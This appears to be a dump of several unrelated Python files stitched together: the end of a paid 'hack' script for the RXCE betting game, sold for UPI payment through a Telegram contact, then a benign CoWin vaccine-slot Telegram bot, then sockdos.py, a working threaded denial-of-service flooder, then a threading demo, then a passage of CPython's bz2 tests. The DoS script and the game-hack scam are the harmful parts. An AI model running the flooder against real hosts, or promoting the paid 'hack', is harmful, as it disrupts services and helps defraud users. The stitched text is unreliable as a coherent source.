print(f"{neon}To Activate The Hack")
print(f"If It Does'nt Open Contact Me On Telegram {yellow}@hackmgk")
print(f"{neon}*---------*----------*-------------*----------*")
print(f"{red}*---------*----------*-------------*----------*")
print("payhere--- UPI : ")
print(f"{yellow}UPI1 : mkeditor778@ybl")
print("UPI2 : mkeditor778@axl")
print("If you have already paid to above UPI")
print(f"{neon}Enter Your Activation Code Or Upi Reference for Opening Hack")
bhai=input(": ")
if(bhai==code or bhai==test or bhai==code1 or bhai==code2):
clear()
print("You have bought hack for 1 day")
print(f"{purple}---------------Your play time----------------")
print("19th Jan 2021, 02:30 PM- 03:00 PM")
print("19th Jan 2021, 05:30 PM- 06:00 PM")
print("19th Jan 2021, 08:30 PM- 09:00 PM")
print("Please play on the given time, and ")
print(f"If you think it is an {red}error {yellow}contact {green}me ")
print(f"{neon}On Telegram {red}@hackmgk")
print("wait.... starting....")
time.sleep(20)
period=rava
hero()
#print("Today Server is off RXCE try tomorrow ")
#rint(" of town, Tomorrow It will work as usual.")
#print(" Thank You!!")
#rint("To all the weekly members next week, cost will be ")
#print(" 4000 INR , because in this week 2 days off " )
#print("Thank You!! ")
sys.exit(" \n \n \n Contact on Telegram @hackmgk")
elif(bhai==nextday):
clear()
banner='figlet RXCEV2.1|lolcat'
system(banner)
print("----------Your play time-----------")
print("8th-14th Dec 2021, 02:30 PM- 03:00 PM")
print("8th-14th Dec 2021, 06:00 PM- 06:30 PM")
print("8th-14th Dec 2021, 08:30 PM- 09:00 PM")
print("Please play on the given time, and ")
print("If you think it is an error contact")
print("wait.... starting....")
time.sleep(20)
period=rava
hero()
#period("Sorry too many people(>20) using hack in same time ")
sys.exit(" \n \n \n Contact on Telegram @hackmgk")
elif(bhai==night):
clear()
print("----------Your play time-----------")
print("9th Dec 2021, 08:30 PM- 09:00 PM")
print("10th Dec 2021, 08:30 PM- 09:00 PM")
print("11th Dec 2021, 08:30 PM- 09:00 PM")
print("Please play on the given time, and ")
print("If you think it is an error contact")
print("wait.... starting....")
time.sleep(20)
period=410
hero()
sys.exit(" \n \n \n Contact on Telegram @hackmgk")
else:
clear()
banner='figlet RXCEV2.1|lolcat'
system(banner)
print("Incorrect Activation Code :")
|
main.py | import logging
import re
import time
from copy import deepcopy
from enum import Enum
from typing import List, Optional
from datetime import datetime
import threading
import traceback
import html
import json
import peewee
import telegram.error
from telegram import (
Update,
InlineKeyboardMarkup,
InlineKeyboardButton,
Bot,
MAX_MESSAGE_LENGTH,
BotCommand,
ParseMode,
)
from telegram.ext import (
Updater,
CommandHandler,
MessageHandler,
Filters,
CallbackContext,
CallbackQueryHandler,
)
from jinja2 import Template
from peewee import (
SqliteDatabase,
Model,
DateTimeField,
CharField,
FixedCharField,
IntegerField,
BooleanField,
)
from cowinapi import CoWinAPI, VaccinationCenter, CoWinTooManyRequests
from settings import TELEGRAM_BOT_TOKEN, DEVELOPER_CHAT_ID, SQLITE_DB_PATH
PINCODE_PREFIX_REGEX = r"^\s*(pincode)?\s*(?P<pincode_mg>\d+)\s*"
AGE_BUTTON_REGEX = r"^age: (?P<age_mg>\d+)"
CMD_BUTTON_REGEX = r"^cmd: (?P<cmd_mg>.+)"
DISABLE_TEXT_REGEX = r"\s*disable|stop|pause\s*"
# All the really complex configs:
# Following says, how often we should poll CoWin APIs for age group 18+. In seconds
MIN_18_WORKER_INTERVAL = 60
# Following says, how often we should poll CoWin APIs for age group 45+. In seconds
MIN_45_WORKER_INTERVAL = 60 * 10 # 10 minutes
# Following decides, should we send a notification to user about 45+ or not.
# If we have sent an alert in the last 30 minutes, we will not bother them
MIN_45_NOTIFICATION_DELAY = 60 * 30
# Whenever an exception occurs, we sleep for these many seconds hoping things will be fine
# when we wake up. This surprisingly works most of the times.
EXCEPTION_SLEEP_INTERVAL = 10
# the amount of time we sleep in background workers whenever we hit their APIs
COWIN_API_DELAY_INTERVAL = 180 # 3 minutes
# the amount of time we sleep when we get 403 from CoWin
LIMIT_EXCEEDED_DELAY_INTERVAL = 60 * 5 # 5 minutes
# Enable logging
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
logger = logging.getLogger(__name__)
CoWinAPIObj = CoWinAPI()
db = SqliteDatabase(
SQLITE_DB_PATH,
pragmas={
"journal_mode": "wal",
"cache_size": -1 * 64000, # 64MB
"foreign_keys": 1,
"ignore_check_constraints": 0,
},
)
class AgeRangePref(Enum):
Unknown = 0
MinAge18 = 1
MinAge45 = 2
MinAgeAny = 3
def __str__(self) -> str:
if self == AgeRangePref.MinAge18:
return "18+"
elif self == AgeRangePref.MinAge45:
return "45+"
else:
return "Both"
class EnumField(IntegerField):
def __init__(self, choices, *args, **kwargs):
super(IntegerField, self).__init__(*args, **kwargs)
self.choices = choices
def db_value(self, value):
return value.value
def python_value(self, value):
return self.choices(value)
# storage classes
class User(Model):
created_at = DateTimeField(default=datetime.now)
updated_at = DateTimeField(default=datetime.now)
deleted_at = DateTimeField(null=True)
last_alert_sent_at: datetime = DateTimeField(default=datetime.now)
total_alerts_sent = IntegerField(default=0)
telegram_id = CharField(max_length=220, unique=True)
chat_id = CharField(max_length=220)
pincode: str = FixedCharField(max_length=6, null=True, index=True)
age_limit: AgeRangePref = EnumField(
choices=AgeRangePref, default=AgeRangePref.Unknown
)
enabled = BooleanField(default=False, index=True)
class Meta:
database = db
def sanitise_msg(msg: str) -> str:
"""
Telegram messages can't be more than `MAX_MESSAGE_LENGTH` bytes. So, this method truncates the message body
with appropriate size and adds a footer saying message was truncated.
CAUTION: This does a really naive truncation which might end up breaking a valid markdown / html to an invalid one
and Telegram will reject that message.
"""
if len(msg) < MAX_MESSAGE_LENGTH:
return msg
help_text = "\n\n (message truncated due to size)"
msg_length = MAX_MESSAGE_LENGTH - len(help_text)
return msg[:msg_length] + help_text
def get_main_buttons() -> List[InlineKeyboardButton]:
return [
InlineKeyboardButton("🔔 Setup Alert", callback_data="cmd: setup_alert"),
InlineKeyboardButton("🔍 Check Open Slots", callback_data="cmd: check_slots"),
]
def get_age_kb() -> InlineKeyboardMarkup:
keyboard = [
[
InlineKeyboardButton("18+", callback_data="age: 1"),
InlineKeyboardButton("45+", callback_data="age: 2"),
InlineKeyboardButton("Both", callback_data="age: 3"),
]
]
return InlineKeyboardMarkup(keyboard)
def get_main_keyboard() -> InlineKeyboardMarkup:
return InlineKeyboardMarkup(
[
[*get_main_buttons()],
[
InlineKeyboardButton("💡 Help", callback_data="cmd: help"),
InlineKeyboardButton("🔒 Privacy Policy", callback_data="cmd: privacy"),
],
]
)
def start(update: Update, _: CallbackContext) -> None:
"""
Handles /start, the very first message the user gets whenever they start interacting with this bot
"""
msg = """Hey there!👋
Welcome to Covid19 Vaccine India Assist bot.
It will weekly check slots availability in your area and alert you when one becomes available. To start either click
🔔 *Setup Alert* or 🔍 *Check Open Slots*.
If you are a first time user it will ask for your age and pincode."""
update.message.reply_text(
msg, reply_markup=get_main_keyboard(), parse_mode="markdown"
)
def cmd_button_handler(update: Update, ctx: CallbackContext) -> None:
"""
Whenever we send buttons to user, we also include callback data. For commands, we usually send the data in the form
of `cmd: <cmd_name>`. Check `get_main_buttons` or `get_main_keyboard` methods to see how the data is sent.
When user clicks on those buttons, we also get the callback data. Following figures out appropriate command to run
"""
query = update.callback_query
query.answer()
if cmd := ctx.match.groupdict().get("cmd_mg"):
cmd = cmd.strip()
if cmd == "setup_alert":
setup_alert_command(update, ctx)
return
elif cmd == "check_slots":
check_slots_command(update, ctx)
return
elif cmd == "privacy":
privacy_policy_handler(update, ctx)
return
elif cmd == "help":
help_handler(update, ctx)
return
else:
update.effective_chat.send_message("cmd not implemented yet")
return
def get_help_text_short() -> str:
return """This bot will help you to check current available slots in one week and also, alert you when one becomes available. To start, either click on "Setup Alert" or "Check Open Slots". For first time users, bot will ask for age preference and pincode.""" ## noqa
def get_help_text() -> str:
return """\n\n*Setup Alert*\nUse this to setup an alert, it will send a message as soon as a slot becomes available. Select the age preference and provide the area pincode of the vaccination center you would like to monitor. Do note that 18+ slots are monitored more often than 45+. Click on /pause to stop alerts and /resume to enable them back.\n\n*Check Open Slots*\nUse this to check the slots availability manually.\n\n*Age Preference*\nTo change age preference, click on /age\n\n*Pincode*\nClick on /pincode to change the pincode. Alternatively, you can send pincode any time and bot will update it.\n\n*Delete*\nClick on /delete if you would like delete all your information.""" ## noqa
def help_handler(update: Update, _: CallbackContext):
header = "💡 Help\n\n"
msg = header + get_help_text_short() + get_help_text()
update.effective_chat.send_message(
msg,
parse_mode="markdown",
reply_markup=InlineKeyboardMarkup([[*get_main_buttons()]]),
)
def delete_cmd_handler(update: Update, _: CallbackContext):
user: User
try:
user = User.get(
User.telegram_id == update.effective_user.id, User.deleted_at.is_null(True)
)
except peewee.DoesNotExist:
update.effective_chat.send_message("No data exists to delete.")
return
user.deleted_at = datetime.now()
user.enabled = False
user.pincode = None
user.age_limit = AgeRangePref.Unknown
user.save()
update.effective_chat.send_message(
"Your data has been successfully deleted. Click on /start to restart the bot."
)
def help_command(update: Update, ctx: CallbackContext) -> None:
help_handler(update, ctx)
def privacy_policy_handler(update: Update, _: CallbackContext):
header = "🔒 Privacy Policy\n\n"
msg = (
f"Covid19 Assist Bot stores minimal and only the information which is necessary. This includes:\n"
" • Telegram account user id ({id})\n"
" • The pincode to search in CoWin site\n"
" • Age preference\n"
"\nThe bot *does not have access* to your real name or phone number."
"\n\nClick on /delete to delete all your data."
)
msg = header + msg.format(id=update.effective_user.id)
update.effective_chat.send_message(msg, parse_mode="markdown")
def age_command(update: Update, _: CallbackContext):
update.effective_chat.send_message(
"Select your age preference", reply_markup=get_age_kb()
)
return
def pincode_command(update: Update, _: CallbackContext):
update.effective_chat.send_message("Enter your pincode")
def check_if_preferences_are_set(
update: Update, ctx: CallbackContext
) -> Optional[User]:
"""
Checks if preferences for the current user are set or not. If not set, asks them to set. If they are set, then
returns the `User` object from DB.
"""
user: User
user, _ = get_or_create_user(
telegram_id=update.effective_user.id, chat_id=update.effective_chat.id
)
if user.age_limit is None or user.age_limit == AgeRangePref.Unknown:
age_command(update, ctx)
return
if user.pincode is None:
pincode_command(update, ctx)
return
return user
def setup_alert_command(update: Update, ctx: CallbackContext) -> None:
user = check_if_preferences_are_set(update, ctx)
if not user:
return
user.enabled = True
user.save()
msg = "🔔 I have setup alerts for you. "
msg_18 = "For age group 18+, as soon as a slot becomes available I will send you a message. "
msg_45 = (
"For age group 45+, I will check slots availability for every 15 minutes and send a message if they are "
"available. "
)
if user.age_limit == AgeRangePref.MinAge18:
msg = msg + msg_18
elif user.age_limit == AgeRangePref.MinAge45:
msg = msg + msg_45
else:
msg = msg + msg_18 + msg_45
update.effective_chat.send_message(msg + "\n\nClick on /pause to pause the alerts.")
def disable_alert_command(update: Update, _: CallbackContext) -> None:
user: User
user, _ = get_or_create_user(
telegram_id=update.effective_user.id, chat_id=update.effective_chat.id
)
user.enabled = False
user.save()
update.effective_chat.send_message(
"🔕 I have disabled the Alerts. Click on /resume to resume the alerts"
)
def get_available_centers_by_pin(pincode: str) -> List[VaccinationCenter]:
vaccination_centers = CoWinAPIObj.calender_by_pin(pincode, CoWinAPI.today())
if vaccination_centers:
vaccination_centers = [
vc for vc in vaccination_centers if vc.has_available_sessions()
]
return vaccination_centers
def get_formatted_message(
centers: List[VaccinationCenter], age_limit: AgeRangePref
) -> str:
"""
Given a list of vaccination centers, this method returns a nicely formatted message which can be sent to the user
param: age_limit is only used for display purposes. If the user's selected preference is both
then we should show the age limit of the vaccination center
"""
header = ""
# Some pincodes have more than 10 centers, in that case we just limit it to 10 and send those only.
if len(centers) > 10:
header = f"Showing 10 centers out of {len(centers)}. Check [CoWin Site](https://www.cowin.gov.in/home) for full list\n" ## noqa
display_age = True if age_limit == AgeRangePref.MinAgeAny else False
# TODO: Fix this shit
template = """
{%- for c in centers[:10] %}
*{{ c.name }}* {%- if c.fee_type == 'Paid' %}*(Paid)*{%- endif %}:{% for s in c.get_available_sessions() %}
• {{s.date}}: {{s.capacity}}{%- if display_age %} *({{s.min_age_limit}}+)*{%- endif %}{% endfor %}
{% endfor %}"""
tm = Template(template)
return header + tm.render(centers=centers, display_age=display_age)
def filter_centers_by_age_limit(
age_limit: AgeRangePref, centers: List[VaccinationCenter]
) -> List[VaccinationCenter]:
"""
filter_centers_by_age_limit filters the centers based on the age preferences set by the user
If there's no filtering required, then it just returns the centers list as it is. If it needs to filter out centers,
then it makes a deep copy of `centers`, modifies it and returns that
"""
if not centers:
return centers
# if user hasn't set any age preferences, then just show everything
if age_limit in [None, AgeRangePref.MinAgeAny, AgeRangePref.Unknown]:
return centers
filter_age: int
if age_limit == AgeRangePref.MinAge18:
filter_age = 18
else:
filter_age = 45
# TODO: FIX THIS! This makes a deep copy of Vaccination Center objects
centers_copy: List[VaccinationCenter] = deepcopy(centers)
for vc in centers_copy:
vc.sessions = vc.get_available_sessions_by_age_limit(filter_age)
results: List[VaccinationCenter] = [
vc for vc in centers_copy if vc.has_available_sessions()
]
return results
def get_message_header(user: User) -> str:
return f"Following slots are available (pincode: {user.pincode}, age preference: {user.age_limit})\n"
def check_slots_command(update: Update, ctx: CallbackContext) -> None:
user = check_if_preferences_are_set(update, ctx)
if not user:
return
vaccination_centers: List[VaccinationCenter]
try:
vaccination_centers = get_available_centers_by_pin(user.pincode)
except CoWinTooManyRequests:
update.effective_chat.send_message(
f"Hey sorry, I wasn't able to reach [CoWin Site](https://www.cowin.gov.in/home) at this moment. "
"Please try after few minutes.",
parse_mode="markdown",
)
return
vaccination_centers = filter_centers_by_age_limit(
user.age_limit, vaccination_centers
)
if not vaccination_centers:
update.effective_chat.send_message(
f"Hey sorry, seems there are no free slots available (pincode: {user.pincode}, age preference: {user.age_limit})"
)
return
msg: str = get_formatted_message(
centers=vaccination_centers, age_limit=user.age_limit
)
msg = get_message_header(user=user) + msg
update.effective_chat.send_message(sanitise_msg(msg), parse_mode="markdown")
return
def default(update: Update, _: CallbackContext) -> None:
update.message.reply_text(
"Sorry, I did not understand. Click on /help to know valid commands"
)
def get_or_create_user(telegram_id: str, chat_id) -> (User, bool):
return User.get_or_create(telegram_id=telegram_id, defaults={"chat_id": chat_id})
def set_age_preference(update: Update, ctx: CallbackContext) -> None:
query = update.callback_query
query.answer()
age_pref = ctx.match.groupdict().get("age_mg")
if age_pref is None:
return
user: User
user, _ = get_or_create_user(
telegram_id=update.effective_user.id, chat_id=update.effective_chat.id
)
user.age_limit = AgeRangePref(int(age_pref))
user.updated_at = datetime.now()
user.deleted_at = None
user.save()
if user.pincode:
update.effective_chat.send_message(
f"I have set your age preference to {user.age_limit}",
reply_markup=InlineKeyboardMarkup([[*get_main_buttons()]]),
)
else:
update.effective_chat.send_message(
f"I have set your age preference to {user.age_limit}. Please enter your pincode to proceed"
)
def set_pincode(update: Update, ctx: CallbackContext) -> None:
pincode = ctx.match.groupdict().get("pincode_mg")
if not pincode:
return
pincode = pincode.strip()
# validating pincode is the third difficult problem of computer science
if pincode in ["000000", "111111", "123456"] or not len(pincode) == 6:
update.effective_chat.send_message(
"Uh oh! That doesn't look like a valid pincode."
"Please enter a valid pincode to proceed"
)
return
user: User
user, _ = get_or_create_user(
telegram_id=update.effective_user.id, chat_id=update.effective_chat.id
)
user.pincode = pincode
user.updated_at = datetime.now()
user.deleted_at = None
user.save()
msg: str = (
f"I have updated your pincode to {pincode}. If you'd like to change it, send a valid pincode "
"any time to me."
)
reply_markup: InlineKeyboardMarkup
if user.age_limit is None or user.age_limit == AgeRangePref.Unknown:
reply_markup = get_age_kb()
msg = msg + "\n\nSelect age preference:"
else:
reply_markup = InlineKeyboardMarkup([[*get_main_buttons()]])
update.effective_chat.send_message(msg, reply_markup=reply_markup)
def send_alert_to_user(
bot: telegram.Bot, user: User, centers: List[VaccinationCenter]
) -> None:
if not centers:
return
msg: str = get_formatted_message(centers=centers, age_limit=user.age_limit)
msg = (
"*[ALERT!]* "
+ get_message_header(user=user)
+ msg
+ "\n Click on /pause to disable the notifications"
)
try:
bot.send_message(
chat_id=user.chat_id, text=sanitise_msg(msg), parse_mode="markdown"
)
except telegram.error.Unauthorized:
# looks like this user blocked us. simply disable them
user.enabled = False
user.save()
else:
user.last_alert_sent_at = datetime.now()
user.total_alerts_sent += 1
user.save()
def periodic_background_worker():
while True:
try:
logger.info("starting a bg worker - periodic_background_worker")
background_worker(age_limit=AgeRangePref.MinAge45)
logger.info("bg worker executed successfully - periodic_background_worker")
time.sleep(MIN_45_WORKER_INTERVAL) # sleep for 10 mins
except CoWinTooManyRequests:
logging.error("got 403 - too many requests - periodic_background_worker")
time.sleep(LIMIT_EXCEEDED_DELAY_INTERVAL)
except Exception as e:
logger.exception("periodic_background_worker", exc_info=e)
time.sleep(EXCEPTION_SLEEP_INTERVAL)
def frequent_background_worker():
while True:
try:
logger.info("starting a bg worker - frequent_background_worker")
background_worker(age_limit=AgeRangePref.MinAge18)
logger.info("bg worker executed successfully - frequent_background_worker")
time.sleep(MIN_18_WORKER_INTERVAL) # sleep for 30 seconds
except CoWinTooManyRequests:
logging.error("got 403 - too many requests - frequent_background_worker")
time.sleep(LIMIT_EXCEEDED_DELAY_INTERVAL)
except Exception as e:
logger.exception("frequent_background_worker", exc_info=e)
time.sleep(EXCEPTION_SLEEP_INTERVAL)
def background_worker(age_limit: AgeRangePref):
bot = Bot(token=TELEGRAM_BOT_TOKEN)
time_now = datetime.now()
# find all distinct pincodes where pincode is not null and at least one user exists with alerts enabled
query = (
User.select(User.pincode)
.where(
(User.pincode.is_null(False))
& (User.enabled == True)
& (
(User.age_limit == AgeRangePref.MinAgeAny)
| (User.age_limit == age_limit)
)
)
.distinct()
)
# TODO: Quick hack to load all pincodes in memory
query = list(query)
for distinct_user in query:
# get all the available vaccination centers with open slots
vaccination_centers = get_available_centers_by_pin(distinct_user.pincode)
# sleep, since we have hit CoWin APIs
time.sleep(COWIN_API_DELAY_INTERVAL)
if not vaccination_centers:
continue
# find all users for this pincode and alerts enabled
user_query = User.select().where(
(User.pincode == distinct_user.pincode)
& (User.enabled == True)
& (
(User.age_limit == AgeRangePref.MinAgeAny)
| (User.age_limit == age_limit)
)
)
for user in user_query:
delta = time_now - user.last_alert_sent_at
# if user age limit is 45, then we shouldn't ping them too often
if user.age_limit == AgeRangePref.MinAge45:
if delta.seconds < MIN_45_NOTIFICATION_DELAY:
continue
filtered_centers = filter_centers_by_age_limit(
user.age_limit, vaccination_centers
)
if not filtered_centers:
continue
send_alert_to_user(bot, user, filtered_centers)
# for users with age limit of 18, we send the alert
if user.age_limit == AgeRangePref.MinAge18:
filtered_centers = filter_centers_by_age_limit(
user.age_limit, vaccination_centers
)
if not filtered_centers:
continue
filtered_centers = filter_centers_by_age_limit(
user.age_limit, vaccination_centers
)
if not filtered_centers:
continue
send_alert_to_user(bot, user, filtered_centers)
# here comes the tricky part. for users who have set up both
# we would want to send 18+ alerts more often than 45+
if user.age_limit == AgeRangePref.MinAgeAny:
filtered_centers: List[VaccinationCenter]
if delta.seconds < MIN_45_NOTIFICATION_DELAY:
# include only 18+ results
filtered_centers = filter_centers_by_age_limit(
AgeRangePref.MinAge18, vaccination_centers
)
else:
# include both results
filtered_centers = filter_centers_by_age_limit(
user.age_limit, vaccination_centers
)
if not filtered_centers:
continue
send_alert_to_user(bot, user, filtered_centers)
# works in the background to remove all the deleted user rows permanently
def clean_up() -> None:
# delete all the users permanently whose deleted_at value is not null
User.delete().where(User.deleted_at.is_null(False))
# source: https://github.com/python-telegram-bot/python-telegram-bot/blob/master/examples/errorhandlerbot.py
def error_handler(update: object, context: CallbackContext) -> None:
logger.error(msg="Exception while handling an update:", exc_info=context.error)
tb_list = traceback.format_exception(
None, context.error, context.error.__traceback__
)
tb_string = "".join(tb_list)
update_str = update.to_dict() if isinstance(update, Update) else str(update)
message = (
f"An exception was raised while handling an update\n"
f"<pre>update = {html.escape(json.dumps(update_str, indent=2, ensure_ascii=False))}"
"</pre>\n\n"
f"<pre>context.chat_data = {html.escape(str(context.chat_data))}</pre>\n\n"
f"<pre>context.user_data = {html.escape(str(context.user_data))}</pre>\n\n"
f"<pre>{html.escape(tb_string)}</pre>"
)
try:
context.bot.send_message(
chat_id=DEVELOPER_CHAT_ID, text=message, parse_mode=ParseMode.HTML
)
except Exception as e:
logger.exception("error_handler", exc_info=e)
def main() -> None:
# initialise bot and set commands
bot = Bot(token=TELEGRAM_BOT_TOKEN)
bot.set_my_commands(
[
BotCommand(command="start", description="start the bot session"),
BotCommand(command="alert", description="enable alerts on new slots"),
BotCommand(
command="help", description="provide help on how to use the bot"
),
BotCommand(command="resume", description="enable alerts on new slots"),
BotCommand(command="pause", description="disable alerts on new slots"),
BotCommand(command="pincode", description="change pincode"),
BotCommand(command="age", description="change age preference"),
]
)
# connect and create tables
db.connect()
db.create_tables(
[
User,
]
)
# create the required index
# TODO:
# User.add_index(User.enabled, User.pincode,
# where=((User.enabled == True) & (User.pincode.is_null(False))))
# initialise the handler
updater = Updater(TELEGRAM_BOT_TOKEN)
# Add handlers
updater.dispatcher.add_handler(CommandHandler("start", start))
updater.dispatcher.add_handler(CommandHandler("help", help_command))
updater.dispatcher.add_handler(CommandHandler("alert", setup_alert_command))
updater.dispatcher.add_handler(CommandHandler("resume", setup_alert_command))
updater.dispatcher.add_handler(CommandHandler("pause", disable_alert_command))
updater.dispatcher.add_handler(CommandHandler("age", age_command))
updater.dispatcher.add_handler(CommandHandler("pincode", pincode_command))
updater.dispatcher.add_handler(CommandHandler("delete", delete_cmd_handler))
updater.dispatcher.add_handler(
CallbackQueryHandler(set_age_preference, pattern=AGE_BUTTON_REGEX)
)
updater.dispatcher.add_handler(
CallbackQueryHandler(cmd_button_handler, pattern=CMD_BUTTON_REGEX)
)
updater.dispatcher.add_handler(
MessageHandler(
Filters.regex(re.compile(PINCODE_PREFIX_REGEX, re.IGNORECASE)), set_pincode
)
)
updater.dispatcher.add_handler(
MessageHandler(
Filters.regex(re.compile(DISABLE_TEXT_REGEX, re.IGNORECASE)),
disable_alert_command,
)
)
updater.dispatcher.add_handler(MessageHandler(~Filters.command, default))
updater.dispatcher.add_error_handler(error_handler)
# launch two background threads, one for slow worker (age group 45+) and another for fast one (age group 18+)
threading.Thread(target=frequent_background_worker).start()
threading.Thread(target=periodic_background_worker).start()
# Start the Bot
updater.start_polling()
# block it, baby
updater.idle()
if __name__ == "__main__":
main()
|
sockdos.py | import socket, threading, sys, os
try:
target = sys.argv[1]
port = int(sys.argv[2])
speed = int(sys.argv[3])
fake_ip = '104.74.112.38'
except:
print("""
Usage:
python3 {} <target_ip> <port> <speed>
""".format(os.path.basename(__file__)))
exit()
def dos():
sent = 0
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /"+target+"HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("HOST: "+fake_ip+"\r\n\r\n").encode('ascii'), (target, port))
s.close()
sent += 1
print(f'sent {sent}')
for i in range(0, speed):
threading.Thread(target=dos).start()
|
creating_threads.py | import time
from threading import Thread
def do_work():
print("Starting work")
time.sleep(1)
print("Finished work")
for _ in range(5):
t = Thread(target=do_work, args=())
t.start()
|
test_bz2.py | from test import support
from test.support import bigmemtest, _4G
import unittest
from io import BytesIO, DEFAULT_BUFFER_SIZE
import os
import pickle
import glob
import tempfile
import pathlib
import random
import shutil
import subprocess
import threading
from test.support import unlink
import _compression
import sys
# Skip tests if the bz2 module doesn't exist.
bz2 = support.import_module('bz2')
from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor
has_cmdline_bunzip2 = None
def ext_decompress(data):
global has_cmdline_bunzip2
if has_cmdline_bunzip2 is None:
has_cmdline_bunzip2 = bool(shutil.which('bunzip2'))
if has_cmdline_bunzip2:
return subprocess.check_output(['bunzip2'], input=data)
else:
return bz2.decompress(data)
class BaseTest(unittest.TestCase):
"Base for other testcases."
TEXT_LINES = [
b'root:x:0:0:root:/root:/bin/bash\n',
b'bin:x:1:1:bin:/bin:\n',
b'daemon:x:2:2:daemon:/sbin:\n',
b'adm:x:3:4:adm:/var/adm:\n',
b'lp:x:4:7:lp:/var/spool/lpd:\n',
b'sync:x:5:0:sync:/sbin:/bin/sync\n',
b'shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\n',
b'halt:x:7:0:halt:/sbin:/sbin/halt\n',
b'mail:x:8:12:mail:/var/spool/mail:\n',
b'news:x:9:13:news:/var/spool/news:\n',
b'uucp:x:10:14:uucp:/var/spool/uucp:\n',
b'operator:x:11:0:operator:/root:\n',
b'games:x:12:100:games:/usr/games:\n',
b'gopher:x:13:30:gopher:/usr/lib/gopher-data:\n',
b'ftp:x:14:50:FTP User:/var/ftp:/bin/bash\n',
b'nobody:x:65534:65534:Nobody:/home:\n',
b'postfix:x:100:101:postfix:/var/spool/postfix:\n',
b'niemeyer:x:500:500::/home/niemeyer:/bin/bash\n',
b'postgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\n',
b'mysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\n',
b'www:x:103:104::/var/www:/bin/false\n',
]
TEXT = b''.join(TEXT_LINES)
DATA = b'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`'
EMPTY_DATA = b'BZh9\x17rE8P\x90\x00\x00\x00\x00'
BAD_DATA = b'this is not a valid bzip2 file'
# Some tests need more than one block of uncompressed data. Since one block
# is at least 100,000 bytes, we gather some data dynamically and compress it.
# Note that this assumes that compression works correctly, so we cannot
# simply use the bigger test data for all tests.
test_size = 0
BIG_TEXT = bytearray(128*1024)
for fname in glob.glob(os.path.join(os.path.dirname(__file__), '*.py')):
with open(fname, 'rb') as fh:
test_size += fh.readinto(memoryview(BIG_TEXT)[test_size:])
if test_size > 128*1024:
break
BIG_DATA = bz2.compress(BIG_TEXT, compresslevel=1)
def setUp(self):
fd, self.filename = tempfile.mkstemp()
os.close(fd)
def tearDown(self):
unlink(self.filename)
class BZ2FileTest(BaseTest):
"Test the BZ2File class."
def createTempFile(self, streams=1, suffix=b""):
with open(self.filename, "wb") as f:
f.write(self.DATA * streams)
f.write(suffix)
def testBadArgs(self):
self.assertRaises(TypeError, BZ2File, 123.456)
self.assertRaises(ValueError, BZ2File, os.devnull, "z")
self.assertRaises(ValueError, BZ2File, os.devnull, "rx")
self.assertRaises(ValueError, BZ2File, os.devnull, "rbt")
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=0)
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=10)
def testRead(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
def testReadBadFile(self):
self.createTempFile(streams=0, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertRaises(OSError, bz2f.read)
def testReadMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testReadMonkeyMultiStream(self):
# Test BZ2File.read() on a multi-stream archive where a stream
# boundary coincides with the end of the raw read buffer.
buffer_size = _compression.BUFFER_SIZE
_compression.BUFFER_SIZE = len(self.DATA)
try:
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
finally:
_compression.BUFFER_SIZE = buffer_size
def testReadTrailingJunk(self):
self.createTempFile(suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT)
